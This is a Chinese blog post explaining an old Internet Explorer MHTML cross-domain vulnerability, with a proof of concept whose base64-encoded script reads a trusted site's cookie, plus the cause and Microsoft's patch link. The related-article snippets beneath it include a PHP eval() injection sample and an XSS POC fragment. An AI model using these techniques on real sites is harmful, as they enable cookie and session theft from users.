微软的MHTML0day漏洞

最新推荐文章于 2024-09-02 10:00:00 发布
最新推荐文章于 2024-09-02 10:00:00 发布
阅读量1.4k 收藏
点赞数
文章标签: 微软 解密 浏览器 iframe ie 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangjiabin2007/article/details/6179455
版权

漏洞表现

http://evildomain.com/mhtml.html,其html代码为:
<iframe src="MHTML:http://trusteddomain.com/demo.html!cookie"></iframe>

其中URL http://trusteddomain.com/demo.html 的代码为:
Content-Type: multipart/related; boundary="_boundary_by_mere"

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PGJvZHk+DQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly90cnVzdGVkZG9tYWluLmNvbS8iPjwvaWZyYW1lPg0KPHNjcmlwdD4NCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA/IGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg==
--_boundary_by_mere--


IE浏览器访问http://evildomain.com/mhtml.html,会获取http://trusteddomain.com/demo.html的内容,并且执行。这里demo.html中的内容是需要base64解密的,解密之后的内容为:
<body>
<iframe id=ifr src="http://trusteddomain.com/"></iframe>
<script>
function crosscookie(){
ifr = ifr.contentWindow ? ifr.contentWindow : ifr.contentDocument;
alert(ifr.document.cookie)
}
setTimeout("crosscookie()",1000);
</script></body>
这个解密之后的内容是为了获取COOKIE。这是因为IE浏览器认为MHTML:http://trusteddomain.com/demo.html!cookie所对应的解密内容和http://trusteddomain.com属于同一个域,有相同的权限,所以可以获取到cookie。这里的cookie被获取是有一个前提:demo.html文件在trusteddomain.com的服务器中。


漏洞原因
1. MHTML允许IE浏览器进行跨域访问,当用户访问evildomain.com/mhtml.html的同时,也访问了trusteddomain.com
2. MHTML:http://trusteddomain.com/demo.html!cookie的内容与http://trusteddomain.com是同源,有相同的权限。

 

漏洞补丁
微软提供MHTML的漏洞补丁 http://support.microsoft.com/kb/2501696

 

漏洞参考文献
http://hi.baidu.com/hi_heige/blog/item/b58a24d2116658123af3cfdc.html
http://www.80vul.com/webzine_0x05/webzine_0x05/0x05%20IE下MHTML协议带来的跨域危害.html

 

wangjiabin2007
关注
CVE-2021-40444分析报告微软MHTML远程命令执行漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1368
CVE-2021-40444漏洞概述.2021 年 8 月 21 日,MSTIC 观察到一名 Mandiant 员工在社交媒体上发布的帖子,该员工具有跟踪 Cobalt Strike Beacon 基础设施的经验。所写文章重点介绍了一个于 2021 年 8 月 19 日上传到 VirusTotal的 Microsoft Word 文档(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 对样本进行了
代码执行漏洞
qq_38348692的博客
09-15 549
1,漏洞产生原因: 在web应用中,有时候程序员而为了考虑灵活性,简洁性,会在代码调用eval函数去处理,比如应当在调用一些能将字符串转化成代码的函数时,没有考虑到用户是否能够控制这个字符串,造成代码执行漏洞。 2,漏洞产生函数: eval() 1)直接利用漏洞源码: <?php $data = $_GET['data']; eval("\$ret = $data"); echo $ret;...
最新系统漏洞--Microsoft Windows MSHTML Platform远程代码执行漏洞
weixin_48555088的博客
10-25 408
最新系统漏洞2021年10月25日 受影响系统: Microsoft Windows Server 2019 Microsoft Windows Server 2016 Microsoft Windows Server 2012 R2 Microsoft Windows Server 2012 Microsoft Windows Server 2008 R2 for x64-based S Microsoft Windows Server 2008 for x64-based Syst Microsoft
Microsoft Windows MHTML脚本代码注入漏洞 (MS11-026) (CVE-2011-0096)
qq_50854662的博客
08-15 2162
Tomcat样列目录session 操控漏洞
JavaScript学习笔记(二十)DOM动画效果
2401_84254011的博客
04-28 1214
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
MHTML中曝出0day漏洞 影响各版Windows
weixin_34190136的博客
09-24 422
微软昨日证实,他们正在调查一个新的0day漏洞,该漏洞存在于MHTML中,会导致信息泄露,影响所有Windows平台,包括Windows XP、Vista、Windows 7和所有版本的Windows Server。 该漏洞是由于MHTML解析文档中内容模块的MINE格式请求的方式所造成的,该漏洞可以允许攻击者在错误的安全上下文中执行脚本。成功利用该漏洞的攻击者能在用户的IE实例中注入客户端脚...
IE mhtml redirection漏洞利用方法
03-03
为了保证客户端安全,xmlhttp是无法获取信息的。但是IE出现安全问题,在服务端通过mhtml重定向漏洞,可以利用xmlhttp获取敏感信息。本文介绍了通过xmlhttp请求本的页面。
微软 (Microsoft1)技术面试题库 - 力扣(LeetCode).mhtml
06-29
微软面试题库 930题 leetcode 2020年6月29日 (上) 最新下载的题目列表,包含频率难度等关键信息
WPS 5亿用户受威胁:APT-C-60利用WPS Office漏洞发动间谍攻击
最新发布
分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……
09-02 837
与韩国有关的网络间谍组织APT-C-60一直在利用Windows版WPS Office的一个零日代码执行漏洞,在东亚目标上安装SpyGlace后门程序。
微软 (Microsoft2)技术面试题库- 力扣(LeetCode).mhtml
06-29
微软面试题库 930题 leetcode 2020年6月29日 (下) 最新题目,包含出现频率难度等关键信息
网络安全技能大赛D模块常规漏洞加固详解.mhtml
01-09
网络安全技能大赛D模块常规漏洞加固详解.mhtml
防止html脚本注入的脚本
04-17
NULL 博文链接:https://username2.iteye.com/blog/1826071
Windows MSHTML远程代码执行漏洞风险通告更新,腾讯安全支持全面检测拦截
qcloud_security的博客
09-09 4244
2021年9月8日,微软官方发布风险通告,公开了一个有关Windows MSHTML 的远程代码执行漏洞。有攻击者试图通过使用特制的Office文档来利用此漏洞,该漏洞风险为高,腾讯安全已捕获在野利用样本,腾讯安全全系列产品已支持对该漏洞的恶意利用进行检测拦截,建议Windows用户警惕来历不明的文件,避免轻易打开可疑文档。 漏洞详情: 2021年9月8日,微软官方发布风险通告,公开了一个有关Windows MSHTML的远程代码执行漏洞。攻击者通过使用特制的Office文档来利用此漏洞,攻击者制作恶意
站脚本攻击漏洞(编码)_通过对HTML响应进行编码来防止站点脚本攻击
cusi77914的博客
06-29 1973
注意:请参考教程“保护应用程序免受站点脚本(XSS)攻击”以使用开发人员沙箱。 该教程中的代码段向您展示了如何使用转义序列,以使任何注入的代码都无法运行。 站点脚本攻击 营造安全文化 公司将应用程序移动到Web上,以改善客户互动,降低业务处理成本并加快结果的速度。 但是这样做也增加了漏洞-除非安全性是应用程序开发过程的组成部分。 要了解有关在组织中创建安全文化的更多信息,请...
Html可能存在的漏洞
永不垂头的博客
07-23 2561
学习笔记—Html可能存在的漏洞 Html可能存在的漏洞 HTML称为超文本标记语言,是一种标识性的语言。它包括一系列标签.通过这些标签可以将网络上的文档格式统一,使分散的Internet资源连接为一个逻辑整体。HTML文本是由HTML命令组成的描述性文本,HTML命令可以说明文字,图形、动画、声音、表格、链接等。 <p></p>段落 <div></div>块 基础、网页必备 纯的html 基本上是不会有漏洞 点击劫持 ```javascript ```
html 表单 漏洞,Microsoft Internet Explorer HTML表单对象远程代码执行漏洞(MS09-034)
weixin_42447265的博客
06-21 284
Bugraq ID: 35826CVE ID:CVE-2009-1918Microsoft Internet Explorer是一款流行的WEB浏览器。Microsoft Internet Explorer在特定条件下处理表单操作存在问题,远程攻击者可以利用漏洞以应用程序权限执行任意指令。攻击者需要构建恶意WEB页,诱使用户访问来触发此漏洞,目前没有详细漏洞细节提供。Microsoft Inter...
html代码漏洞,Apache Struts多个HTML代码注入漏洞
weixin_35733151的博客
06-10 177
POC 1:-----Stored XSSPOST struts2-showcase/person/editPerson.action HTTP/1.1Host: SERVER_IP:8080User-Agent: struts2-showcase XSS-TESTContent-Type: application/x-www-form-urlencodedContent-Length: 192P...
HTML协议漏洞 网民可能成“枪手”
8080的专栏
08-24 888
HTML协议漏洞 网民可能成“枪手”2001-8-23 13:03:45,阅读次数: 746新闻内容:  日前,德国的独立编程人员托普夫称,他发现黑客可以利用普通的互联网浏览器在用户不知情的情况下,假他们之手向服务器发动攻击。 托普夫上周在其名为《HTML表格协议攻击》的论文中指出,黑客使用的技术与正常的网页获取用户输入的信息时所使用的技术相同。在正常的网页中,HTML代码将用户提交
IE MHTML 重定向漏洞:xmlhttp 获取信息技术分析
"IE mhtml 重定向漏洞是一种安全漏洞,允许攻击者通过XMLHttpRequest在Internet Explorer浏览器中绕过同源策略,从而获取敏感信息。这种漏洞主要影响IE6.0,但据报告,即使使用更新的版本如IE7,也可能遭受攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值